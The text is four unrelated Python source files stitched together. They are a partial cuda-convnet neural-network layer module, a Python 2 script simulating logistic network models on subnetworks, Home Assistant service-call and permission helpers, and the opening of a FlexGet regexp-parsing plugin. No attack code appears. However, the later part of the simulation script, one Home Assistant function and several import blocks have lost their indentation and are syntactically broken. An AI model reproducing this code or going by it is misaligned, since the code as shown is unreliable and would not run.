            raise RuntimeError("MaxPool2DCCLayer only supports using the same stride in both directions, but strides=(%d, %d)" % strides)
        # ignore_border argument is for compatibility with MaxPool2DLayer.
        # it is not supported. Borders are never ignored.
        if ignore_border != False:
            raise RuntimeError("MaxPool2DCCLayer does not support ignore_border.")
        self.ds = ds[0]  # scalar: pooling regions are square
        if strides is None:
            self.stride = self.ds
        else:
            self.stride = strides[0]
        self.dimshuffle = dimshuffle
        self.pool_op = MaxPool(ds=self.ds, stride=self.stride)
    def get_output_shape_for(self, input_shape):
        if self.dimshuffle:
            batch_size = input_shape[0]
            num_input_channels = input_shape[1]
            input_width, input_height = input_shape[2:4]
        else:
            batch_size = input_shape[3]
            num_input_channels = input_shape[0]
            input_width, input_height = input_shape[1:3]
        # ceil division: partial windows at the border are still pooled
        output_width = int(np.ceil(float(input_width - self.ds + self.stride) / self.stride))
        output_height = int(np.ceil(float(input_height - self.ds + self.stride) / self.stride))
        if self.dimshuffle:
            return (batch_size, num_input_channels, output_width, output_height)
        else:
            return (num_input_channels, output_width, output_height, batch_size)
    def get_output_for(self, input, *args, **kwargs):
        if self.dimshuffle:
            input = input.dimshuffle(1, 2, 3, 0) # bc01 to c01b
        contiguous_input = gpu_contiguous(input)
        pooled = self.pool_op(contiguous_input)
        if self.dimshuffle:
            return pooled.dimshuffle(3, 0, 1, 2) # c01b to bc01
        else:
            return pooled
# TODO: crossmapnorm
# from pylearn2.sandbox.cuda_convnet.response_norm import CrossMapNorm
## Helper classes for switching between bc01 and c01b input formats
class ShuffleBC01ToC01BLayer(base.Layer):
    """
    Dimshuffles 4D input from theano's bc01 layout to cuda-convnet's c01b,
    for interoperability between the two families of ops.
    """
    # axis permutation applied to both the tensor and its shape
    _perm = (1, 2, 3, 0)
    def get_output_shape_for(self, input_shape):
        return tuple(input_shape[axis] for axis in self._perm)
    def get_output_for(self, input, *args, **kwargs):
        return input.dimshuffle(*self._perm)
bc01_to_c01b = ShuffleBC01ToC01BLayer # shortcut
class ShuffleC01BToBC01Layer(base.Layer):
    """
    Dimshuffles 4D input from cuda-convnet's c01b layout back to theano's
    bc01, for interoperability between the two families of ops.
    """
    # axis permutation applied to both the tensor and its shape
    _perm = (3, 0, 1, 2)
    def get_output_shape_for(self, input_shape):
        return tuple(input_shape[axis] for axis in self._perm)
    def get_output_for(self, input, *args, **kwargs):
        return input.dimshuffle(*self._perm)
c01b_to_bc01 = ShuffleC01BToBC01Layer # shortcut
## c01b versions of other Layer classes
class NINLayer_c01b(base.Layer):
    """
    This does the same as nntools.layers.NINLayer, but operates with c01b
    axis arrangement instead of bc01. This reduces the number of shuffles
    and reshapes required and might be faster as a result.

    Applies a per-position linear map over the channel axis (axis 0 in
    c01b), followed by a bias and nonlinearity.
    """
    def __init__(self, input_layer, num_units, untie_biases=False,
                 W=init.Uniform(), b=init.Constant(0.), nonlinearity=nonlinearities.rectify):
        super(NINLayer_c01b, self).__init__(input_layer)
        if nonlinearity is None:
            self.nonlinearity = nonlinearities.identity
        else:
            self.nonlinearity = nonlinearity
        self.num_units = num_units
        self.untie_biases = untie_biases
        output_shape = self.input_layer.get_output_shape()
        num_input_channels = output_shape[0]  # c01b: channels come first
        self.W = self.create_param(W, (num_units, num_input_channels))
        if self.untie_biases:
            # one bias per unit and per spatial position (all but the batch axis)
            output_shape = self.get_output_shape()
            self.b = self.create_param(b, (num_units,) + output_shape[1:-1])
        else:
            self.b = self.create_param(b, (num_units,))
    def get_params(self):
        return [self.W, self.b]
    def get_bias_params(self):
        return [self.b]
    def get_output_shape_for(self, input_shape):
        return (self.num_units,) + input_shape[1:]
    def get_output_for(self, input, *args, **kwargs):
        out = T.tensordot(self.W, input, axes=[[1], [0]]) # fc * c01b... = f01b...
        if self.untie_biases:
            # fix: wrap range() in list() so the concatenation also works on
            # Python 3, where range() is not a list; identical on Python 2
            bias_axes = list(range(input.ndim - 1)) + ['x']
        else:
            bias_axes = [0] + (['x'] * (input.ndim - 1))
        b_shuffled = self.b.dimshuffle(bias_axes)
        return self.nonlinearity(out + b_shuffled)
|
|
#!/usr/bin/env python
import numpy as np
import matplotlib.pyplot as plt
import scikits.statsmodels.api as sm
import scipy.optimize as opt
import scipy.linalg as la
# Parameters
params = { 'N': 400,                       # full network size
           'alpha_sd': 0.0,                # sd for normal node effects (0 = off)
           'alpha_unif': 0.0,              # half-width for uniform node effects (0 = off)
           'B': 0,                         # number of edge covariates
           'beta_sd': 1.0,                 # sd of true covariate coefficients
           'x_discrete': False,            # 0/2-valued vs. standard normal covariates
           'target': ('degree', 2),        # expected-graph property kappa is tuned to
           'N_subs': range(15, 60, 5),     # subnetwork sizes to examine
           'num_fits': 2,                  # fits per subnetwork size
           'do_inference': True,
           'external_regression': False,   # use statsmodels Logit instead of log_reg
           'use_BFGS': False,              # BFGS with gradient vs. simplex in log_reg
           'perturb_Phi': 0.0 }            # sd of noise added to design matrix
# Set random seed for reproducible output
np.random.seed(137)
# Define mapping from covariates and parameters alpha, beta, kappa to
# edge probabilties
def edge_probabilities(alpha, beta, kappa, x):
    """Map covariates and parameters (alpha, beta, kappa) to an N x N
    matrix of edge probabilities via a logistic link.

    alpha : (2, N) array of row effects (alpha[0]) and column effects
            (alpha[1]).
    beta  : (B,) covariate coefficients.
    kappa : scalar offset/sparsity parameter.
    x     : (N, N, B) edge covariates.
    """
    # logit P_ij = alpha[0, i] + alpha[1, j] + x[i, j, :] . beta + kappa
    # NOTE(fix): the original code added alpha[0, j] for the column effect,
    # leaving alpha[1] entirely unused even though it is generated and
    # centered alongside alpha[0] elsewhere in this script; use alpha[1]
    # for the column effects here.
    # (Also vectorized: broadcasting replaces the two O(N) Python loops.)
    logit_P = alpha[0][:, np.newaxis] + alpha[1][np.newaxis, :]
    logit_P = logit_P + np.dot(x, beta) + kappa
    return 1.0 / (np.exp(-logit_P) + 1.0)
# Define negative log-likelihood
def nll(alpha, beta, kappa, A, x):
    """Negative Bernoulli log-likelihood of adjacency matrix A under the
    edge probabilities implied by (alpha, beta, kappa) and covariates x."""
    P = edge_probabilities(alpha, beta, kappa, x)
    # A * log(P) is algebraically equal to log(P ** A) for A in {0, 1},
    # but avoids the elementwise power (cheaper and numerically safer).
    return -np.sum(A * np.log(P) + (1.0 - A) * np.log(1.0 - P))
# Numerical search for kappa to provide the right expected graph properties
def target_to_kappa(d, alpha, beta, x):
    """Numerically search for kappa giving the right expected graph property.

    d is a (target, value) pair where target is 'degree' (expected mean
    degree) or 'density' (expected edge density).  Returns the kappa found
    by golden-section search.

    Raises ValueError for an unknown target (the original silently made the
    objective return None, which failed cryptically inside opt.golden).
    """
    target, val = d
    if target not in ('degree', 'density'):
        raise ValueError('unknown target: %s' % str(target))
    N = x.shape[0]
    def obj(kappa):
        exp_edges = np.sum(edge_probabilities(alpha, beta, kappa, x))
        if target == 'degree':
            exp_degree = exp_edges / (1.0 * N)
            return abs(exp_degree - val)
        # target == 'density'
        exp_density = exp_edges / (1.0 * N ** 2)
        return abs(exp_density - val)
    return opt.golden(obj)
# Logistic regression solver relying on BFGS minimizer
def log_reg(y, Phi):
    """Fit a logistic regression of y on design matrix Phi and return the
    estimated coefficient vector.

    Uses BFGS with an analytic gradient when params['use_BFGS'] is set,
    otherwise a derivative-free simplex search.
    """
    n_coef = Phi.shape[1]

    def neg_log_lik(beta):
        P = 1.0 / (np.exp(-np.dot(Phi, beta)) + 1.0)
        return -np.sum(np.log(P ** y) + np.log((1.0 - P) ** (1.0 - y)))

    if params['use_BFGS']:
        T = np.dot(y, Phi)

        def grad(beta):
            P = 1.0 / (np.exp(-np.dot(Phi, beta)) + 1.0)
            return np.dot(P, Phi) - T

        return opt.fmin_bfgs(neg_log_lik, np.zeros(n_coef), fprime = grad)
    return opt.fmin(neg_log_lik, np.zeros(n_coef))
# Procedure to find MLE via logistic regression
def infer(A, x, fit_alpha = False):
    """Find the MLE of beta via logistic regression.

    A: (N, N) adjacency matrix; x: (N, N, B) covariates.
    With fit_alpha=True, per-row/per-column effect parameters are added to
    the design matrix, after screening out degenerate submatrices whose
    effect estimates would diverge to infinity.
    Returns a dict with 'beta' and the design-matrix dimensions
    'N_act_r' (rows) and 'N_act_c' (columns) actually used.
    """
    N = A.shape[0]
    B = x.shape[2]
    if fit_alpha:
        # (Separately) sort rows and columns of A by increasing sums
        r_ord = np.argsort(np.sum(A, axis = 1))
        c_ord = np.argsort(np.sum(A, axis = 0))
        A = A[r_ord][:,c_ord]
        x = x[r_ord][:,c_ord]
        # Recursively examine for submatrices that will send
        # corresponding EMLE parameter estimates to infinity and
        # assemble list of "active" submatrices to retain
        to_screen = [(np.arange(N), np.arange(N))]
        act = []
        while len(to_screen) > 0:
            r_act, c_act = to_screen.pop()
            A_act = A[r_act][:,c_act]
            n_act = A_act.shape
            violation = False
            # corner splits carry no information and are skipped below
            trivial = [(0,0), (0,n_act[1]), (n_act[0],0), (n_act[0],n_act[1])]
            for i,j in [(i,j)
                        for i in range(n_act[0] + 1)
                        for j in range(n_act[1] + 1)]:
                if (i,j) in trivial: continue
                # a split is degenerate when the upper-left block is all
                # zeros and the lower-right block is all ones
                if np.any(A_act[:i][:,:j]): continue
                if not np.all(A_act[i:][:,j:]): continue
                # keep rescreening the two mixed off-diagonal blocks
                if i > 0 and j < n_act[1]:
                    A_sub = A_act[:i][:,j:]
                    if (np.any(A_sub) and (not np.all(A_sub))):
                        to_screen.append((r_act[np.arange(i)],
                                          c_act[np.arange(j, n_act[1])]))
                if i < n_act[0] and j > 0:
                    A_sub = A_act[i:][:,:j]
                    if (np.any(A_sub) and (not np.all(A_sub))):
                        to_screen.append((r_act[np.arange(i, n_act[0])],
                                          c_act[np.arange(j)]))
                violation = True
                break
            if not violation:
                act.append((r_act, c_act))
        if len(act) == 0:
            # everything screened out: nothing is estimable
            return { 'beta': np.zeros(B), 'N_act_r': 0, 'N_act_c': 0 }
        # Calculate size of design matrix and outcome vector, then
        # construct them
        N_act_r, N_act_c = 0, B
        for r_act, c_act in act:
            N_act_r += len(r_act) * len(c_act)
            N_act_c += len(r_act) + len(c_act)
        y = np.zeros((N_act_r,))
        Phi = np.zeros((N_act_r, N_act_c))
        i_offset, j_offset = 0, B
        for r_act, c_act in act:
            i_inc = len(r_act) * len(c_act)
            j_inc_r, j_inc_c = len(r_act), len(c_act)
            A_act = A[r_act][:,c_act]
            x_act = x[r_act][:,c_act]
            y[i_offset:(i_offset + i_inc)] = A_act.reshape((i_inc,))
            # covariate columns
            for b in range(B):
                Phi[i_offset:(i_offset + i_inc), b] = \
                    x_act[:,:,b].reshape((i_inc,))
            # indicator columns for this submatrix's row effects
            for r in range(j_inc_r):
                phi_row = np.zeros((j_inc_r,j_inc_c))
                phi_row[r,:] = 1.0
                Phi[i_offset:(i_offset + i_inc), j_offset + r] = \
                    phi_row.reshape((i_inc,))
            j_offset += j_inc_r
            # indicator columns for this submatrix's column effects
            for c in range(j_inc_c):
                phi_col = np.zeros((j_inc_r,j_inc_c))
                phi_col[:,c] = 1.0
                Phi[i_offset:(i_offset + i_inc), j_offset + c] = \
                    phi_col.reshape((i_inc,))
            j_offset += j_inc_c
            i_offset += i_inc
        # NOTE(review): bare except silently falls back to a zero estimate
        # after dumping diagnostics; consider narrowing the exception type.
        try:
            Phi += params['perturb_Phi'] * \
                np.random.normal(size = (N_act_r, N_act_c))
            if params['external_regression']:
                coefs = sm.Logit(y, Phi).fit().params
            else:
                coefs = log_reg(y, Phi)
        except:
            print y
            print Phi
            print Phi.shape
            for r_act, c_act in act:
                A_act = A[r_act][:,c_act]
                print A_act
                print np.sum(A_act, axis = 1)
                print np.sum(A_act, axis = 0)
            return { 'beta': np.zeros(B), 'N_act_r': 0, 'N_act_c': 0 }
        return { 'beta': coefs[0:B], 'N_act_r': N_act_r, 'N_act_c': N_act_c }
    else:
        # No node effects: plain logistic regression with an intercept column
        y = A.reshape((N*N,))
        Phi = np.zeros((N*N,B + 1))
        Phi[:,B] = 1.0
        for b in range(B):
            Phi[:,b] = x[:,:,b].reshape((N*N,))
        Phi += params['perturb_Phi'] * np.random.normal(size = (N*N, B+1))
        if params['external_regression']:
            coefs = sm.Logit(y, Phi).fit().params
        else:
            coefs = log_reg(y, Phi)
        return { 'beta': coefs[0:B], 'N_act_r': N*N, 'N_act_c': (B + 1) }
# Generate latent parameters
# alpha holds two rows of node effects (alpha[0] and alpha[1]), each
# centered to zero mean so they are identifiable relative to kappa.
if params['alpha_sd'] > 0.0:
    alpha = np.random.normal(0, params['alpha_sd'], (2,params['N']))
elif params['alpha_unif'] > 0.0:
    alpha = np.random.uniform(-params['alpha_unif'], params['alpha_unif'],
                              (2,params['N']))
else:
    alpha = np.zeros((2,params['N']))
alpha[0] -= np.mean(alpha[0])
alpha[1] -= np.mean(alpha[1])
# True covariate coefficients
beta = np.random.normal(0, params['beta_sd'], params['B'])
# Edge covariates: 0/2-valued or standard normal
if params['x_discrete']:
    x = 2 * np.random.binomial(1, 0.5, (params['N'], params['N'], params['B']))
else:
    x = np.random.normal(0, 1, (params['N'], params['N'], params['B']))
# Procedure for generating random subnetwork
def subnetwork(n):
    """Sample a random n-node induced subnetwork: pick n nodes, tune kappa
    to the target property, then draw edges from the model."""
    inds = np.arange(params['N'])
    np.random.shuffle(inds)
    chosen = inds[:n]
    alpha_sub = alpha[:, chosen]
    x_sub = x[chosen][:, chosen]
    kappa_sub = target_to_kappa(params['target'], alpha_sub, beta, x_sub)
    P_sub = edge_probabilities(alpha_sub, beta, kappa_sub, x_sub)
    A_sub = np.random.random((n, n)) < P_sub
    return alpha_sub, kappa_sub, A_sub, x_sub
# Some pre-analysis output
print 'Parameters:'
for field in params:
print '%s: %s' % (field, str(params[field]))
# Fit model on partially observed subnetworks and assess performance
bias = np.empty((params['B'],2,len(params['N_subs'])))
variance = np.empty((params['B'],2,len(params['N_subs'])))
act_ratio = np.empty((len(params['N_subs']),params['num_fits']))
network = np.empty((4,len(params['N_subs'])))
kappas = np.empty((len(params['N_subs']),params['num_fits']))
for n, N_sub in enumerate(params['N_subs']):
print 'N_sub = %d' % N_sub
estimate = np.empty((params['B'],2,params['num_fits']))
network_obs = np.empty((4,params['num_fits']))
for num_fit in range(params['num_fits']):
alpha_sub, kappa_sub, A_sub, x_sub = subnetwork(N_sub)
print 'kappa_sub = %.2f' % kappa_sub
network_obs[0,num_fit] = 1.0 * np.sum(A_sub) / N_sub
network_obs[1,num_fit] = np.max(np.sum(A_sub, axis = 1))
network_obs[2,num_fit] = np.max(np.sum(A_sub, axis = 0))
network_obs[3,num_fit] = 1.0 * np.sum(np.diagonal(A_sub)) / N_sub
kappas[n,num_fit] = kappa_sub
if params['do_inference']:
sub_nll = nll(alpha_sub, beta, kappa_sub, A_sub, x_sub)
print 'True subnetwork NLL: %.2f' % sub_nll
# Fit full model
fit = infer(A_sub, x_sub, fit_alpha = True)
for b in range(params['B']):
estimate[b,0,num_fit] = fit['beta'][b]
if fit['N_act_r'] > 0:
act_ratio[n,num_fit] = fit['N_act_r'] / fit['N_act_c']
else:
act_ratio[n,num_fit] = 0
# Fit model with zero alpha, i.e., stationary model
fit = infer(A_sub, x_sub, fit_alpha = False)
for b in range(params['B']):
estimate[b,1,num_fit] = fit['beta'][b]
if params['do_inference']:
for b, true_val in enumerate(beta):
for m in range(2):
bias[b,m,n] = np.mean(estimate[b,m] - true_val)
variance[b,m,n] = np.var(estimate[b,m])
for metric in range(4):
network[metric,n] = np.mean(network_obs[metric])
if params['do_inference']:
bias_sq = bias ** 2
mse = variance + bias_sq
# Plot inference performace, as well as data/parameter ratio
if params['do_inference']:
plt.figure()
plt.subplot(2,1,1)
for b, true_val in enumerate(beta):
plt.plot(params['N_subs'], mse[b,0] / abs(true_val), 'b')
plt.plot(params['N_subs'], mse[b,1] / abs(true_val), 'r')
plt.ylim(0, 3.0)
plt.title('Scaled MSE of beta')
plt.subplot(2,1,2)
for n in range(params['num_fits']):
plt.plot(params['N_subs'], act_ratio[:,n], 'k.', hold = True)
plt.ylabel('N_act_r / N_act_c')
# Plot network statistics as well as sparsity parameter
plt.figure()
for metric, name in enumerate(['average degree',
'max out-degree',
'max in-degree',
'self-edge probability']):
plt.subplot(5,1,(metric+1))
plt.plot(params['N_subs'], network[metric], '-')
plt.ylabel(name)
plt.ylim(ymin = 0)
plt.subplot(5,1,5)
for n in range(params['num_fits']):
plt.plot(params['N_subs'], kappas[:,n], 'k.', hold = True)
plt.ylabel('kappa_sub')
plt.show()
|
|
"""Service calling related helpers."""
import asyncio
from functools import wraps
import logging
from typing import Callable
import voluptuous as vol
from homeassistant.auth.permissions.const import CAT_ENTITIES, POLICY_CONTROL
from homeassistant.const import (
ATTR_ENTITY_ID, ENTITY_MATCH_ALL, ATTR_AREA_ID)
import homeassistant.core as ha
from homeassistant.exceptions import (
HomeAssistantError, TemplateError, Unauthorized, UnknownUser)
from homeassistant.helpers import template, typing
from homeassistant.loader import async_get_integration, bind_hass
from homeassistant.util.yaml import load_yaml
import homeassistant.helpers.config_validation as cv
from homeassistant.util.async_ import run_coroutine_threadsafe
from homeassistant.helpers.typing import HomeAssistantType
# Keys recognized in service dicts passed to (async_)call_from_config.
CONF_SERVICE = 'service'
CONF_SERVICE_TEMPLATE = 'service_template'
CONF_SERVICE_ENTITY_ID = 'entity_id'
CONF_SERVICE_DATA = 'data'
CONF_SERVICE_DATA_TEMPLATE = 'data_template'
_LOGGER = logging.getLogger(__name__)
# hass.data key under which per-'domain.service' descriptions are cached.
SERVICE_DESCRIPTION_CACHE = 'service_description_cache'
@bind_hass
def call_from_config(hass, config, blocking=False, variables=None,
                     validate_config=True):
    """Call a service based on a config hash.

    Thread-safe synchronous wrapper around async_call_from_config.
    """
    coro = async_call_from_config(
        hass, config, blocking, variables, validate_config)
    run_coroutine_threadsafe(coro, hass.loop).result()
@bind_hass
async def async_call_from_config(hass, config, blocking=False, variables=None,
                                 validate_config=True, context=None):
    """Call a service based on a config hash.

    The service may be named directly (CONF_SERVICE) or via a template
    (CONF_SERVICE_TEMPLATE); service data may be literal and/or templated.
    Invalid config and template errors are logged and the call is aborted
    (service-name template errors re-raise when blocking=True).
    """
    if validate_config:
        try:
            config = cv.SERVICE_SCHEMA(config)
        except vol.Invalid as ex:
            _LOGGER.error("Invalid config for calling service: %s", ex)
            return
    if CONF_SERVICE in config:
        domain_service = config[CONF_SERVICE]
    else:
        try:
            config[CONF_SERVICE_TEMPLATE].hass = hass
            domain_service = config[CONF_SERVICE_TEMPLATE].async_render(
                variables)
            # validate the rendered 'domain.service' string
            domain_service = cv.service(domain_service)
        except TemplateError as ex:
            if blocking:
                raise
            _LOGGER.error('Error rendering service name template: %s', ex)
            return
        except vol.Invalid:
            if blocking:
                raise
            _LOGGER.error('Template rendered invalid service: %s',
                          domain_service)
            return
    domain, service_name = domain_service.split('.', 1)
    service_data = dict(config.get(CONF_SERVICE_DATA, {}))
    if CONF_SERVICE_DATA_TEMPLATE in config:
        try:
            template.attach(hass, config[CONF_SERVICE_DATA_TEMPLATE])
            # templated data is rendered on top of the literal data
            service_data.update(template.render_complex(
                config[CONF_SERVICE_DATA_TEMPLATE], variables))
        except TemplateError as ex:
            _LOGGER.error('Error rendering data template: %s', ex)
            return
    if CONF_SERVICE_ENTITY_ID in config:
        service_data[ATTR_ENTITY_ID] = config[CONF_SERVICE_ENTITY_ID]
    await hass.services.async_call(
        domain, service_name, service_data, blocking=blocking, context=context)
@bind_hass
def extract_entity_ids(hass, service_call, expand_group=True):
    """Extract a list of entity ids from a service call.

    Will convert group entity ids to the entity ids it represents.
    Thread-safe synchronous wrapper around async_extract_entity_ids.
    """
    future = run_coroutine_threadsafe(
        async_extract_entity_ids(hass, service_call, expand_group),
        hass.loop)
    return future.result()
@bind_hass
async def async_extract_entity_ids(hass, service_call, expand_group=True):
    """Extract a list of entity ids from a service call.

    Will convert group entity ids to the entity ids it represents,
    and resolve area ids to the entities of devices in those areas.

    Async friendly.
    """
    entity_ids = service_call.data.get(ATTR_ENTITY_ID)
    area_ids = service_call.data.get(ATTR_AREA_ID)
    if not entity_ids and not area_ids:
        return []
    extracted = set()
    if entity_ids:
        # Entity ID attr can be a list or a string
        if isinstance(entity_ids, str):
            entity_ids = [entity_ids]
        if expand_group:
            entity_ids = \
                hass.components.group.expand_entity_ids(entity_ids)
        extracted.update(entity_ids)
    if area_ids:
        if isinstance(area_ids, str):
            area_ids = [area_ids]
        # resolve areas -> devices -> entities via the registries
        dev_reg, ent_reg = await asyncio.gather(
            hass.helpers.device_registry.async_get_registry(),
            hass.helpers.entity_registry.async_get_registry(),
        )
        devices = [
            device
            for area_id in area_ids
            for device in
            hass.helpers.device_registry.async_entries_for_area(
                dev_reg, area_id)
        ]
        extracted.update(
            entry.entity_id
            for device in devices
            for entry in
            hass.helpers.entity_registry.async_entries_for_device(
                ent_reg, device.id)
        )
    return extracted
async def _load_services_file(hass: HomeAssistantType, domain: str):
    """Load services file for an integration.

    Returns the parsed YAML dict, or {} when the file is missing or
    unparseable (a warning is logged in either case).
    """
    integration = await async_get_integration(hass, domain)
    path = str(integration.file_path / 'services.yaml')
    try:
        return await hass.async_add_executor_job(load_yaml, path)
    except FileNotFoundError:
        _LOGGER.warning("Unable to find services.yaml for the %s integration",
                        domain)
    except HomeAssistantError:
        _LOGGER.warning("Unable to parse services.yaml for the %s integration",
                        domain)
    return {}
@bind_hass
async def async_get_all_descriptions(hass):
    """Return descriptions (i.e. user documentation) for all service calls.

    Results are cached in hass.data under SERVICE_DESCRIPTION_CACHE, keyed
    by 'domain.service'; only domains with unseen services reload their
    services.yaml.
    """
    descriptions_cache = hass.data.setdefault(SERVICE_DESCRIPTION_CACHE, {})
    format_cache_key = '{}.{}'.format
    services = hass.services.async_services()
    # See if there are new services not seen before.
    # Any service that we saw before already has an entry in description_cache.
    missing = set()
    for domain in services:
        for service in services[domain]:
            if format_cache_key(domain, service) not in descriptions_cache:
                missing.add(domain)
                break
    # Files we loaded for missing descriptions
    loaded = {}
    if missing:
        # load all missing services.yaml files concurrently
        contents = await asyncio.gather(*[
            _load_services_file(hass, domain) for domain in missing
        ])
        for domain, content in zip(missing, contents):
            loaded[domain] = content
    # Build response
    descriptions = {}
    for domain in services:
        descriptions[domain] = {}
        for service in services[domain]:
            cache_key = format_cache_key(domain, service)
            description = descriptions_cache.get(cache_key)
            # Cache missing descriptions
            if description is None:
                domain_yaml = loaded[domain]
                yaml_description = domain_yaml.get(service, {})
                # Don't warn for missing services, because it triggers false
                # positives for things like scripts, that register as a service
                description = descriptions_cache[cache_key] = {
                    'description': yaml_description.get('description', ''),
                    'fields': yaml_description.get('fields', {})
                }
            descriptions[domain][service] = description
    return descriptions
@bind_hass
async def entity_service_call(hass, platforms, func, call, service_name='',
                              required_features=None):
    """Handle an entity service call.

    Calls all platforms simultaneously.  func is either the name of an
    entity method (then keyword-called with the service data) or a
    coroutine function receiving (entity, call).
    """
    # Resolve the calling user's entity-permission checker (None = no checks)
    if call.context.user_id:
        user = await hass.auth.async_get_user(call.context.user_id)
        if user is None:
            raise UnknownUser(context=call.context)
        entity_perms = user.permissions.check_entity
    else:
        entity_perms = None
    # Are we trying to target all entities
    if ATTR_ENTITY_ID in call.data:
        target_all_entities = call.data[ATTR_ENTITY_ID] == ENTITY_MATCH_ALL
    else:
        # Remove the service_name parameter along with this warning
        _LOGGER.warning(
            'Not passing an entity ID to a service to target all '
            'entities is deprecated. Update your call to %s to be '
            'instead: entity_id: %s', service_name, ENTITY_MATCH_ALL)
        target_all_entities = True
    if not target_all_entities:
        # A set of entities we're trying to target.
        entity_ids = await async_extract_entity_ids(hass, call, True)
    # If the service function is a string, we'll pass it the service call data
    if isinstance(func, str):
        data = {key: val for key, val in call.data.items()
                if key != ATTR_ENTITY_ID}
    # If the service function is not a string, we pass the service call
    else:
        data = call
    # Check the permissions
    # A list with for each platform in platforms a list of entities to call
    # the service on.
    platforms_entities = []
    if entity_perms is None:
        for platform in platforms:
            if target_all_entities:
                platforms_entities.append(list(platform.entities.values()))
            else:
                platforms_entities.append([
                    entity for entity in platform.entities.values()
                    if entity.entity_id in entity_ids
                ])
    elif target_all_entities:
        # If we target all entities, we will select all entities the user
        # is allowed to control.
        for platform in platforms:
            platforms_entities.append([
                entity for entity in platform.entities.values()
                if entity_perms(entity.entity_id, POLICY_CONTROL)])
    else:
        for platform in platforms:
            platform_entities = []
            for entity in platform.entities.values():
                if entity.entity_id not in entity_ids:
                    continue
                # an explicitly targeted entity without permission is an error
                if not entity_perms(entity.entity_id, POLICY_CONTROL):
                    raise Unauthorized(
                        context=call.context,
                        entity_id=entity.entity_id,
                        permission=POLICY_CONTROL
                    )
                platform_entities.append(entity)
            platforms_entities.append(platform_entities)
    tasks = [
        _handle_service_platform_call(func, data, entities, call.context,
                                      required_features)
        for platform, entities in zip(platforms, platforms_entities)
    ]
    if tasks:
        done, pending = await asyncio.wait(tasks)
        assert not pending
        for future in done:
            future.result()  # pop exception if have
async def _handle_service_platform_call(func, data, entities, context,
required_features):
"""Handle a function call."""
tasks = []
for entity in entities:
if not entity.available:
continue
# Skip entities that don't have the required feature.
if required_features is not None \
and not any(entity.supported_features & feature_set
for feature_set in required_features):
continue
entity.async_set_context(context)
if isinstance(func, str):
await getattr(entity, func)(**data)
else:
await func(entity, data)
if entity.should_poll:
tasks.append(entity.async_update_ha_state(True))
if tasks:
done, pending = await asyncio.wait(tasks)
assert not pending
for future in done:
future.result() # pop exception if have
@bind_hass
@ha.callback
def async_register_admin_service(
        hass: typing.HomeAssistantType, domain: str,
        service: str, service_func: Callable,
        schema: vol.Schema = vol.Schema({}, extra=vol.PREVENT_EXTRA)) -> None:
    """Register a service that requires admin access."""
    @wraps(service_func)
    async def admin_handler(call):
        # Only calls carrying a user context are permission-checked;
        # calls without one (e.g. from automations) pass straight through.
        user_id = call.context.user_id
        if user_id:
            user = await hass.auth.async_get_user(user_id)
            if user is None:
                raise UnknownUser(context=call.context)
            if not user.is_admin:
                raise Unauthorized(context=call.context)

        await hass.async_add_job(service_func, call)

    hass.services.async_register(domain, service, admin_handler, schema)
@bind_hass
@ha.callback
def verify_domain_control(hass: HomeAssistantType, domain: str) -> Callable:
    """Ensure permission to access any entity under domain in service call."""
    def decorator(service_handler: Callable) -> Callable:
        """Decorate."""
        if not asyncio.iscoroutinefunction(service_handler):
            raise HomeAssistantError(
                'Can only decorate async functions.')

        async def check_permissions(call):
            """Check user permission and raise before call if unauthorized."""
            user_id = call.context.user_id
            if not user_id:
                # No user attached to the call: nothing to verify.
                return await service_handler(call)

            user = await hass.auth.async_get_user(user_id)
            if user is None:
                raise UnknownUser(
                    context=call.context,
                    permission=POLICY_CONTROL,
                    user_id=user_id)

            reg = await hass.helpers.entity_registry.async_get_registry()
            domain_entities = (
                entry.entity_id for entry in reg.entities.values()
                if entry.platform == domain
            )
            # Control permission on any one entity of the domain suffices.
            if any(user.permissions.check_entity(entity_id, POLICY_CONTROL)
                   for entity_id in domain_entities):
                return await service_handler(call)

            raise Unauthorized(
                context=call.context,
                permission=POLICY_CONTROL,
                user_id=user_id,
                perm_category=CAT_ENTITIES
            )

        return check_permissions

    return decorator
|
|
from __future__ import unicode_literals, division, absolute_import
from builtins import * # noqa pylint: disable=unused-import, redefined-builtin
import codecs
import re
import logging
import os
from flexget import plugin
from flexget.entry import Entry
from flexget.event import event
from flexget.utils.cached_input import cached
log = logging.getLogger('regexp_parse')
class RegexpParse(object):
    """Take input from a web resource or file and parse entries out of it
    with regexps supplied in the config file.

    source: is a file or url to get the data from. You can specify a username:password

    sections: Takes a list of dicts that contain regexps to split the data up into sections.
    The regexps listed here are used by findall so every matching string in the data will be
    a valid section.

    keys: hold the keys that will be set in the entries

    key:
      regexps: a list of dicts that hold regexps. The key is set to the first string that matches
      any of the regexps listed. The regexps are evaluated in the order they are supplied so if a
      string matches the first regexp none of the others in the list will be used.

      required: a boolean that when set to true will only allow entries that contain this key
      onto the next stage. url and title are always required no matter what you do (part of flexget)

    #TODO: consider adding a set field that will allow you to set the field if no regexps match
    #TODO: consider a mode field that allows a growing list for a field instead of just setting to
    # first match

    Example config

    regexp_parse:
      source: http://username:password@ezrss.it/feed/
      sections:
        - {regexp: "(?<=<item>).*?(?=</item>)", flags: "DOTALL,IGNORECASE"}
      keys:
        title:
          regexps:
            - {regexp: '(?<=<title><!\[CDATA\[).*?(?=\]\]></title>)'} #comment
        url:
          regexps:
            - {regexp: "magnet:.*?(?=])"}
        custom_field:
          regexps:
            - {regexp: "custom regexps", flags: "comma separated list of flags (see python regex docs)"}
          required: False
        custom_field2:
          regexps:
            - {regexp: 'first custom regexps'}
            - {regexp: "can't find first regexp so try this one"}
    """

    # dict used to convert string values of regexp flags to int
    FLAG_VALUES = {'DEBUG': re.DEBUG,
                   'I': re.I,
                   'IGNORECASE': re.IGNORECASE,
                   'L': re.L,
                   'LOCALE': re.LOCALE,
                   'M': re.M,
                   'MULTILINE': re.MULTILINE,
                   'S': re.S,
                   'DOTALL': re.DOTALL,
                   'U': re.U,
                   'UNICODE': re.UNICODE,
                   'X': re.X,
                   'VERBOSE': re.VERBOSE
                   }

    def __init__(self):
        # Keys that must be present in an entry for it to be accepted;
        # repopulated from the config on every task run (see on_task_input).
        self.required = []

    def validator(self):
        """Build and return the config validator for this plugin."""
        from flexget import validator
        root = validator.factory('dict')
        root.accept('url', key='source', required=True)
        root.accept('file', key='source', required=True)

        # sections to divide source into
        sections_regexp_lists = root.accept('list', key='sections')
        section_regexp_list = sections_regexp_lists.accept('dict', required=True)
        section_regexp_list.accept('regexp', key='regexp', required=True)
        section_regexp_list.accept('text', key='flags')

        keys = root.accept('dict', key='keys', required=True)

